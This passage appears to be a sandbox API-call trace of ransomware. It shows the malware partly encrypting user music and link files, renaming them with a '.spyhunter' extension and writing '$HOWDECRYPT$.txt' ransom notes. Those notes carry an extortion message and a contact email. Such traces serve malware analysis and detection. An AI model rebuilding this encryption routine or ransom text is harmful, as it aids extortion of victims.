(lpFirst="JcxqEST.wav", lpSrch=".txt") returned 0x0 [0148.013] GetProcessHeap () returned 0x2c0000 [0148.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.013] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248efc4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248efc4*=0x2800, lpOverlapped=0x0) returned 1 [0148.014] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.014] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248efc4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248efc4*=0x2800, lpOverlapped=0x0) returned 1 [0148.015] GetProcessHeap () returned 0x2c0000 [0148.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.015] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.015] WriteFile (in: hFile=0xa0, lpBuffer=0x248f004*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248efc4, lpOverlapped=0x0 | out: lpBuffer=0x248f004*, lpNumberOfBytesWritten=0x248efc4*=0x4, lpOverlapped=0x0) returned 1 [0148.015] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248efc4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248efc4*=0x30, lpOverlapped=0x0) returned 1 [0148.015] CloseHandle (hObject=0xa0) returned 1 [0148.015] GetProcessHeap () returned 0x2c0000 [0148.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.015] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\JcxqEST.wav.spyhunter") returned 68 [0148.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\JcxqEST.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\jcxqest.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\JcxqEST.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\jcxqest.wav.spyhunter")) returned 1 [0148.057] GetProcessHeap () returned 0x2c0000 [0148.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.057] GetProcessHeap () returned 0x2c0000 [0148.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.057] GetProcessHeap () returned 0x2c0000 [0148.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2db78 | out: hHeap=0x2c0000) returned 1 [0148.057] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f000 | out: pbBuffer=0x248f000) returned 1 [0148.057] GetProcessHeap () returned 0x2c0000 [0148.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.057] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eff8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eff8*=0x30) returned 1 [0148.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\IvN7VbU.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\ivn7vbu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.058] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\IvN7VbU.wav") returned 58 [0148.058] StrStrW (lpFirst="IvN7VbU.wav", lpSrch=".txt") returned 0x0 [0148.058] GetProcessHeap () returned 0x2c0000 [0148.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.058] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248efbc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248efbc*=0x2800, lpOverlapped=0x0) returned 1 [0148.059] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.059] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248efbc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248efbc*=0x2800, lpOverlapped=0x0) returned 1 [0148.059] GetProcessHeap () returned 0x2c0000 [0148.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.059] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.059] WriteFile (in: hFile=0xa0, lpBuffer=0x248effc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248efbc, lpOverlapped=0x0 | out: lpBuffer=0x248effc*, lpNumberOfBytesWritten=0x248efbc*=0x4, lpOverlapped=0x0) returned 1 [0148.059] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248efbc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248efbc*=0x30, lpOverlapped=0x0) returned 1 [0148.059] CloseHandle (hObject=0xa0) returned 1 [0148.059] GetProcessHeap () returned 0x2c0000 [0148.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.059] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\IvN7VbU.wav.spyhunter") returned 68 [0148.060] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\IvN7VbU.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\ivn7vbu.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\IvN7VbU.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\ivn7vbu.wav.spyhunter")) returned 1 [0148.060] GetProcessHeap () returned 0x2c0000 [0148.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.060] GetProcessHeap () returned 0x2c0000 [0148.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.060] GetProcessHeap () returned 0x2c0000 [0148.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2dab8 | out: hHeap=0x2c0000) returned 1 [0148.060] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f000 | out: pbBuffer=0x248f000) returned 1 [0148.061] GetProcessHeap () returned 0x2c0000 [0148.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.061] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eff8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eff8*=0x30) returned 1 [0148.061] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\EhRE.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\ehre.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.061] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\EhRE.m4a") returned 55 [0148.061] StrStrW (lpFirst="EhRE.m4a", lpSrch=".txt") returned 0x0 [0148.061] GetProcessHeap () returned 0x2c0000 [0148.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.061] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248efbc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248efbc*=0x2800, lpOverlapped=0x0) returned 1 [0148.062] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.062] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248efbc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248efbc*=0x2800, lpOverlapped=0x0) returned 1 [0148.062] GetProcessHeap () returned 0x2c0000 [0148.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.062] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.063] WriteFile (in: hFile=0xa0, lpBuffer=0x248effc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248efbc, lpOverlapped=0x0 | out: lpBuffer=0x248effc*, lpNumberOfBytesWritten=0x248efbc*=0x4, lpOverlapped=0x0) returned 1 [0148.063] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248efbc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248efbc*=0x30, lpOverlapped=0x0) returned 1 [0148.063] CloseHandle (hObject=0xa0) returned 1 [0148.063] GetProcessHeap () returned 0x2c0000 [0148.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.063] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\EhRE.m4a.spyhunter") returned 65 [0148.063] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\EhRE.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\ehre.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\EhRE.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\ehre.m4a.spyhunter")) returned 1 [0148.063] GetProcessHeap () returned 0x2c0000 [0148.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.063] GetProcessHeap () returned 0x2c0000 [0148.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.064] GetProcessHeap () returned 0x2c0000 [0148.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2668 | out: hHeap=0x2c0000) returned 1 [0148.064] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eff8 | out: pbBuffer=0x248eff8) returned 1 [0148.064] GetProcessHeap () returned 0x2c0000 [0148.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.064] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eff0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eff0*=0x30) returned 1 [0148.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\8mijRx3Zc2-jD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\8mijrx3zc2-jd.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.064] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\8mijRx3Zc2-jD.wav") returned 64 [0148.064] StrStrW (lpFirst="8mijRx3Zc2-jD.wav", lpSrch=".txt") returned 0x0 [0148.064] GetProcessHeap () returned 0x2c0000 [0148.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.064] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248efb4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248efb4*=0x2800, lpOverlapped=0x0) returned 1 [0148.065] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.065] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248efb4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248efb4*=0x2800, lpOverlapped=0x0) returned 1 [0148.065] GetProcessHeap () returned 0x2c0000 [0148.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.065] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.065] WriteFile (in: hFile=0xa0, lpBuffer=0x248eff4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248efb4, lpOverlapped=0x0 | out: lpBuffer=0x248eff4*, lpNumberOfBytesWritten=0x248efb4*=0x4, lpOverlapped=0x0) returned 1 [0148.065] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248efb4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248efb4*=0x30, lpOverlapped=0x0) returned 1 [0148.065] CloseHandle (hObject=0xa0) returned 1 [0148.066] GetProcessHeap () returned 0x2c0000 [0148.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.066] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\8mijRx3Zc2-jD.wav.spyhunter") returned 74 [0148.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\8mijRx3Zc2-jD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\8mijrx3zc2-jd.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\8mijRx3Zc2-jD.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\8mijrx3zc2-jd.wav.spyhunter")) returned 1 [0148.211] GetProcessHeap () returned 0x2c0000 [0148.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.211] GetProcessHeap () returned 0x2c0000 [0148.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.211] GetProcessHeap () returned 0x2c0000 [0148.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5ea8 | out: hHeap=0x2c0000) returned 1 [0148.211] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eff8 | out: pbBuffer=0x248eff8) returned 1 [0148.211] GetProcessHeap () returned 0x2c0000 [0148.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.211] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eff0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eff0*=0x30) returned 1 [0148.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.413] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 51 [0148.413] StrStrW (lpFirst="Desktop.lnk", lpSrch=".txt") returned 0x0 [0148.413] GetProcessHeap () returned 0x2c0000 [0148.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.414] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248efb4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248efb4*=0x1e6, lpOverlapped=0x0) returned 1 [0148.414] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffe1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.414] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1e6, lpNumberOfBytesWritten=0x248efb4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248efb4*=0x1e6, lpOverlapped=0x0) returned 1 [0148.415] GetProcessHeap () returned 0x2c0000 [0148.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.415] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.415] WriteFile (in: hFile=0x9c, lpBuffer=0x248eff4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248efb4, lpOverlapped=0x0 | out: lpBuffer=0x248eff4*, lpNumberOfBytesWritten=0x248efb4*=0x4, lpOverlapped=0x0) returned 1 [0148.415] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248efb4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248efb4*=0x30, lpOverlapped=0x0) returned 1 [0148.415] CloseHandle (hObject=0x9c) returned 1 [0148.415] GetProcessHeap () returned 0x2c0000 [0148.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.415] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.spyhunter") returned 61 [0148.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.spyhunter")) returned 1 [0148.421] GetProcessHeap () returned 0x2c0000 [0148.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.422] GetProcessHeap () returned 0x2c0000 [0148.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.422] GetProcessHeap () returned 0x2c0000 [0148.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf590 | out: hHeap=0x2c0000) returned 1 [0148.422] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eff0 | out: pbBuffer=0x248eff0) returned 1 [0148.422] GetProcessHeap () returned 0x2c0000 [0148.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.422] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efe8*=0x30) returned 1 [0148.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.422] GetProcessHeap () returned 0x2c0000 [0148.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.422] GetProcessHeap () returned 0x2c0000 [0148.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0aae8 | out: hHeap=0x2c0000) returned 1 [0148.422] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eff0 | out: pbBuffer=0x248eff0) returned 1 [0148.422] GetProcessHeap () returned 0x2c0000 [0148.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.422] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efe8*=0x30) returned 1 [0148.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.423] GetProcessHeap () returned 0x2c0000 [0148.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.423] GetProcessHeap () returned 0x2c0000 [0148.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0aa48 | out: hHeap=0x2c0000) returned 1 [0148.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.423] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0148.423] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef1f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f048, lpOverlapped=0x0 | out: lpBuffer=0x248ef1f*, lpNumberOfBytesWritten=0x248f048*=0x127, lpOverlapped=0x0) returned 1 [0148.424] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0148.424] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f048, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f048*=0x2ac, lpOverlapped=0x0) returned 1 [0148.424] CloseHandle (hObject=0x9c) returned 1 [0148.424] GetProcessHeap () returned 0x2c0000 [0148.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85550 | out: hHeap=0x2c0000) returned 1 [0148.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.425] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0148.425] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef1b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f044, lpOverlapped=0x0 | out: lpBuffer=0x248ef1b*, lpNumberOfBytesWritten=0x248f044*=0x127, lpOverlapped=0x0) returned 1 [0148.426] lstrlenA 